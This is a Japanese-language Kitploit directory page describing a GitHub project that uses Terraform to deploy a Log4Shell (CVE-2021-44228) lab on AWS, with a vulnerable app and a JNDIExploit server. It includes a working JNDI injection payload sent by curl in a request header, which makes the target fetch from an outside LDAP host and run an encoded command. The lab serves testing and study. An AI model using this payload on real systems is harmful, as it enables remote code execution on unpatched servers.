Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-vulnerable-app-cve-2021-44228-terraform — 脆弱なアプリケーションをデプロイするためのTerraformと、CVE-2021-44228と連携するJDNIExploit | Kitploit
ツール/GitHubGitHub/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform
クラウドインフラストラクチャセキュリティペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

log4j-vulnerable-app-cve-2021-44228-terraform

脆弱なアプリケーションをデプロイするためのTerraformと、CVE-2021-44228と連携するJDNIExploit

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
214年前未レビュー

log4j-vulnerable-app-cve-2021-44228-terraform

脆弱なアプリとJNDIExploitをCVE-2021-44228と連携させるためのTerraform

スタックについて

このTerraformはAWSクラウドのVPC上に2つのインスタンスを作成します。

AWS_ACCESS_KEY_IDとAWS_SECRET_ACCESS_KEYをエクスポートするだけでOKです。

1つ目のインスタンスはJNDIExploitです。

2つ目はlog4jエクスプロイト用のVulnerable-Appです。

apply前にterraform内のSSH公開鍵を置き換えてください

root@kitploit:~
terraform init
terraform plan
terraform apply --auto-approve

エクスプロイト

AWSにデプロイ後、curlリクエストでエクスプロイトし、vulnerable-appコンテナの/tmpにファイルが作成されることを確認できます。

root@kitploit:~
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

vulnerable-appサーバーで以下のコマンドを実行してコマンド実行を確認します。pwnedファイルが表示されるはずです。

root@kitploit:~
sudo docker exec -ti vulnerable-app ls /tmp
ツールをダウンロード